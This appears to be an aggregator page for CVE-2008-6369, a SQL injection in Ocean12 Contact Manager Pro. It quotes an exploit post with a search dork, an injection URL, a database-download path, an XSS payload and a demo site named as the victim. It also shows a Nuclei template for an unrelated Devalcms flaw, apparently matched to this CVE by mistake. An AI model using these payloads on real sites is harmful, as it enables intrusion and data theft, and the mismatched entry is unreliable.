CVE-2008-6369
Published 2009-03-02
CVE-2008-6369: SQL injection vulnerability in default.asp in Ocean12 Contact Manager Pro 1.02 allows remote attackers to execute arbitrary SQL commands via the Sort parameter.
Priority P343 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.00% (58.5th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ocean12tech | contact_manager_pro | — | — |
No detection rules found.
Exploit-DB
Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure
exploitdb·2008-11-27
CVE-2008-6370 Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure
---
#########################################################
Portal Name: Ocean12 Contact Manager Pro
Version : 1.02
Vendor : http://ocean12tech.com/products/contact
Dork: Maintained with the Ocean12 Contact Manager Pro v1.02
Author : Pouya_Server , [email protected]
Vulnerability : (DDV,XSS,SQL)
#########################################################
[SQL]:
http://site.com/path/default.asp?DisplayFormat=Card&Sort=[SQL]
[Database Disclosure Vulnerability]:
http://site.com/path/o12con.mdb
[XSS]:
http://site.com/path/?DisplayFormat=>">alert(1369)%3B&Action=Pouya_Server
Victim :
http://ocean12tech.com/products/contact/demo
# milw0rm.com [2008-11-27]
Nuclei
Devalcms 1.4a - Cross-Site Scripting
nuclei·CVSS 4.3
CVE-2008-6982 [MEDIUM] Devalcms 1.4a - Cross-Site Scripting
Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
Template:
id: CVE-2008-6982

info:
  name: Devalcms 1.4a - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/6369
    - http://sourceforge.net/projects/devalc
No writeups or analysis indexed.
References:
http://osvdb.org/50316
http://secunia.com/advisories/32903
http://www.securityfocus.com/bid/32502
https://exchange.xforce.ibmcloud.com/vulnerabilities/46961
https://www.exploit-db.com/exploits/7244
Published: 2009-03-02